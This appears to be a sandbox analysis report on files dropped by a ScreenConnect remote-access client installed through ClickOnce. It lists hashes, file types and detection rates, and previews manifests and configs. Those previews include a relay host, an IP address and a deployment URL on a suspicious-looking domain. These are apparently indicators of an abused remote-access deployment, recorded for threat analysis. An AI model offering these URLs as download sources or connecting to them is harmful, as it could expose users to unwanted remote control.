                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
Preview:
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <configSections>
    <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
  </configSections>
  <ScreenConnect.ApplicationSettings>
    <setting name="HostToAddressMap" serializeAs="String">
      <value>cp3back96.site=37.221.67.19-29%2f10%2f2024%2018%3a35%3a22</value>
    </setting>
  </ScreenConnect.ApplicationSettings>
</configuration>
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):735
                                                                                                                                                                              Entropy (8bit):4.453891178092255
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
Preview:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <rewrite>
      <rules>
        <rule name="HTTPS redirect" patternSyntax="Wildcard" stopProcessing="true">
          <match url="*" />
          <conditions logicalGrouping="MatchAll">
            <add input="{HTTPS}" pattern="off" />
            <add input="{REQUEST_URI}" pattern="*.well-known/acme-challenge/*" negate="true" />
          </conditions>
          <action type="Redirect" url="https:{HTTP_HOST}{REQUEST_URI}" redirectType="Found" />
        </rule>
      </rules>
    </rewrite>
  </system.webServer>
</configuration>
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):61952
                                                                                                                                                                              Entropy (8bit):6.0424578422545006
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with very long lines (618), with CRLF line terminators
                                                                                                                                                                              Category:modified
                                                                                                                                                                              Size (bytes):15014
                                                                                                                                                                              Entropy (8bit):3.814860964944939
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
Preview:
PLATFORM VERSION INFO
  Windows : 10.0.19045.0 (Win32NT)
  Common Language Runtime : 4.0.30319.42000
  System.Deployment.dll : 4.8.4654.0 built by: NET48REL1LAST_B
  clr.dll : 4.8.4645.0 built by: NET48REL1LAST_B
  dfdll.dll : 4.8.4654.0 built by: NET48REL1LAST_B
  dfshim.dll : 10.0.19041.30000 (WinBuild.160101.0800)

SOURCES
  Deployment url : https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):144124
                                                                                                                                                                              Entropy (8bit):5.694726688017173
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
Preview:
<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">
  <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="23.9.10.8817" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />
  <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />
  <deployment install="false" trustURLParameters="tr
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):192512
                                                                                                                                                                              Entropy (8bit):6.5759745825926155
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1041
                                                                                                                                                                              Entropy (8bit):5.148278749531531
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
Preview:
<?xml version="1.0" encoding="utf-8"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">
  <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="23.9.10.8817" />
  <file name="ScreenConnect.Client.dll" />
  <dependency>
    <dependentAssembly>
      <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />
    </dependentAssembly>
  </dependency>
  <dependency>
    <dependentAssembly>
      <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="23.9.10.8817" />
    </dependentAssembly>
  </dependency>
  <dependency>
    <dependentAssembly>
      <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />
    </dependentAssembly>
  </dependency>
  <depende
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):61952
                                                                                                                                                                              Entropy (8bit):6.0424578422545006
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:7Sx8zDzYn1DruJCelbgZfBQeV8lsNEbgO:7Sx8z/uNruJv9wQeVXK
                                                                                                                                                                              MD5:22AF3A23BD30484514CDACF67C5B3810
                                                                                                                                                                              SHA1:E92A4EAEE9D896964DE541CE2F01C2404B638258
                                                                                                                                                                              SHA-256:7C5442121DBA2A30AB9579EC08E111DED372CF9CF90FB3256F273980B975AFA9
                                                                                                                                                                              SHA-512:95E40B27E90FCE7CA85E76AFBBC16EB62B4BB977664702B987DE2EB2294E6FE9E6DF5610EC7B2362C2C68493313F30FBBCBD3446DBE8AE2FA47B89407F5D5936
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1636
                                                                                                                                                                              Entropy (8bit):5.0848956029560135
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onRzgeP0A2+vSkcyMQcbEMQcuMQcVSkcf5bdTo:3FYZ8h9o9gI0A2CHMQTMQ3MQGAXTo
                                                                                                                                                                              MD5:F94D041A8128BE81C4347CAF6A3C47BF
                                                                                                                                                                              SHA1:3285F9ACF70C0E4D34F888C28BD3F693E3DF5909
                                                                                                                                                                              SHA-256:91A65BACAD5F7F70BDDC6209ED65DD5C375CEF9F3C289EAB83FD90D622ADF46B
                                                                                                                                                                              SHA-512:90199543207CAF9B4501BE7E9509DC9526DAFCD5602AAED700314763021C8F3ED06D93A31A90A34CB19D4FB7184AA7D154B197F9E535657AEB9EB872DA377A41
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="23.9.10.8817" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="23.9.10.8817" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):95520
                                                                                                                                                                              Entropy (8bit):6.505299402844754
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:0g1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkg4T0HMc7Jxc:NhbNDxZGXfdHrX7rAc6myJkg4T0H/A
                                                                                                                                                                              MD5:DC615E9D8EC81CBF2E2452516373E5A0
                                                                                                                                                                              SHA1:EC83D37A4F45CAEB07B1605324D0315F959452E9
                                                                                                                                                                              SHA-256:E9AB064ED381C29A3930F75CA3E05605C6EE07F30A69C043F576A5461DE3BAFC
                                                                                                                                                                              SHA-512:82FE00447FB9785264DFB8032399ADF6D33D91D71058212D252742C9E5FD54F5A52F6BAF4FB05E95F9A4055057C60A33A7C1C642F18A6A4E045B49BE88FA5D9F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):531456
                                                                                                                                                                              Entropy (8bit):6.031735419537473
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:ZPpB0+E5A976t5puf9NTh/k4dKRYJUYg7N+earZ5Ghfn55AJ6m/JaXAQKx4kEYYo:dpq+Ezuf9N0RYJZPUI6
                                                                                                                                                                              MD5:B319407E807BE1A49E366F7F8EA7EE2A
                                                                                                                                                                              SHA1:B12197A877FB7E33B1CB5BA11B0DA5CA706581BA
                                                                                                                                                                              SHA-256:761B7E50BAA229E8AFCD9A50990D7F776DDB5ED1EA5FBB131C802E57CF918742
                                                                                                                                                                              SHA-512:DC497643790DC608DECE9C8FE7264EFEDD13724BD24C9BF28A60D848B405FDDEFB8337A60F3F32BB91518910E02C7A2AAF29FC32F86A464DFCAFA365526BDB7F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1216
                                                                                                                                                                              Entropy (8bit):5.130181995746891
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onR+geP0AKvSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AGGVETDTo
                                                                                                                                                                              MD5:6DA6DC34636435E9C2BD1B5FF79091B5
                                                                                                                                                                              SHA1:61B6D8C16330FE9063F041BCC025C10DE82D876B
                                                                                                                                                                              SHA-256:98D4EDAA86468540D2D17EF17A9BCD7224B128099A51A8F92A65A88950DCB44C
                                                                                                                                                                              SHA-512:0BB929107ECFA257DFB2FF7B37955D8C2402287E989C015632A6292362858667A398AD0563103C1324A29585A8177AAA4BCE3C57D867735E40D2CC5C996BD5B9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="23.9.10.8817" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1716224
                                                                                                                                                                              Entropy (8bit):6.635479721420864
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:ZSjm7Fj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUw:Sm7JkGYYpT0+TFiH7efP
                                                                                                                                                                              MD5:29454A0CB83F28C24805E9A70E53444A
                                                                                                                                                                              SHA1:334202965B07AB69F08B16FED0EE6C7274463556
                                                                                                                                                                              SHA-256:998CC3F9AF5BD41CCF0F9BE86192BBE20CDEC08A6FF73C1199E1364195A83E14
                                                                                                                                                                              SHA-512:62790920974A2F1B018D466AE3E3B5100006A3C8013F43BDB04AF7074CFE5D992CAAEB610DE2B1B72FF0E4ACF8762DB1513A4A0CF331F9A340AE0CE53C3BE895
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1982
                                                                                                                                                                              Entropy (8bit):5.056583067402645
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onRbggeP0AovSkcyMQcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AkHMQGQAXRTFgTo
                                                                                                                                                                              MD5:1FB3A39063C9FBBC9252D1224CF8C89D
                                                                                                                                                                              SHA1:0F0622EB6205F515651E055C17D0067A94308721
                                                                                                                                                                              SHA-256:199C3F5089B07F1FB6CB343180620B2094BCDDA9E1F6A3F41269C56402D98439
                                                                                                                                                                              SHA-512:8C70FF2FE2F1935454AA6BB4CE0998DA1ADCBFE7219F1EAEE4688EE86BBC730DE30347F39B9B1413CBD345D1BF786491ED2F79142D9333DBA3A7F0EDC9F48E3A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="23.9.10.8817" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="23.9.10.8817" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):61216
                                                                                                                                                                              Entropy (8bit):6.318400837211405
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:0Ai+pmi/djqbv8DtYQ4RE+TC3l/ibU37DIx4:0Upmi1YQb1l3X
                                                                                                                                                                              MD5:10DBA57F22A6AB4039330000570F39F8
                                                                                                                                                                              SHA1:B8B5C65A89256177DA802C4C9CBD11B013221730
                                                                                                                                                                              SHA-256:9BD8D15759F83D99EDD1F2617D59A94E1C2BB4BD7C4977958F5D5F22C5A7C469
                                                                                                                                                                              SHA-512:38230B63A4630145608F619D75CA3115C05AB0338FB57566E012DF1BD157123A670A37AE0FEA92351AB7352319A5AF29F9DB3F8BB14962F3F0DE3A4F5A5B754C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):266
                                                                                                                                                                              Entropy (8bit):4.842791478883622
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):587040
                                                                                                                                                                              Entropy (8bit):6.166636022526366
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:npu96mzdjnwbrYQySjbs03fG+Yg2PgG7x:CpjpSjq77x
                                                                                                                                                                              MD5:5DEC65C4047DE914C78816B8663E3602
                                                                                                                                                                              SHA1:8807695EE8345E37EFEC43CBC0874277ED9B0A66
                                                                                                                                                                              SHA-256:71602F6B0B27C8B7D8AD624248E6126970939EFFDE785EC913ACE19052E9960E
                                                                                                                                                                              SHA-512:27B5DCB5B0AEADF246B91A173D06E5E8D6CF2CD19D86CA358E0A85B84CD9D8F2B26372EF34C3D427F57803D90F2E97CF59692C80C268A71865F08FC0E7CE42D1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):266
                                                                                                                                                                              Entropy (8bit):4.842791478883622
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2573
                                                                                                                                                                              Entropy (8bit):5.02538862565643
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:3FYZ8h9o5gI0A7HMQAXQ3MQTMQRGTDBTo:1YiW4AIBvtI
                                                                                                                                                                              MD5:EFA59A7F55AF829C3974A02F30EBE80C
                                                                                                                                                                              SHA1:0FABA6763D910D5EE104E3457045C63CCC5BF79B
                                                                                                                                                                              SHA-256:3E2D5CC7867AFA23663D5894127CE6E2880D3075773A249B37576EDA5088875A
                                                                                                                                                                              SHA-512:72262B09C21DC4A2B2701A5B32C149349FA3107035D5A115EAC4335E3961DCF12A7A867AEFF595C13AA618EA955B604538C0F4E529CB6A76FFF0CB75927CC74D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="23.9.10.8817" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="23.9.10.8817" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):17866
                                                                                                                                                                              Entropy (8bit):5.957264907751996
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:jeowfbgEfIaMLf6svxX9nCCX9FX9R/QPIYM7Y7:jF68xX9fX9FX9R/QPIN07
                                                                                                                                                                              MD5:F4B84E283123B025A90BBDE33E2080FD
                                                                                                                                                                              SHA1:CC57BFD02228BE76C6E08BDE16996FA992FF0E54
                                                                                                                                                                              SHA-256:93F9EB492B6952D8C7AA1EF1EE5A901234BA1FD2D5EF58D24E1FAEF597EA8E02
                                                                                                                                                                              SHA-512:ABC92965BF97C37A614B556D2219D06E63687777D79DF5FFB4B5D447DD138C160E5A45CAB76A2353D758AD62960F2E58745F0523881FF6C0EA4CCBCD7ED40002
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="23.9.10.8817" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="23.9.10.8817" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):26
                                                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:gAWY3n:qY3n
                                                                                                                                                                              MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                                                                                                                                              SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                                                                                                                                              SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                                                                                                                                              SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:[ZoneTransfer]..ZoneId=3..
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):81696
                                                                                                                                                                              Entropy (8bit):5.850192336318162
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:GxIh+Sflv4V/bBI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7xk7NxGC:Em9CukLdtkL
                                                                                                                                                                              MD5:C333D3A6EEB74E4D76C3B9E0F6BFD04C
                                                                                                                                                                              SHA1:A39E2643E8DBD2097829E0B08938726557CB8E36
                                                                                                                                                                              SHA-256:998D7A0CD6B1A837489E55E99CB992088B9FDE220A1025346A461849E1F50D22
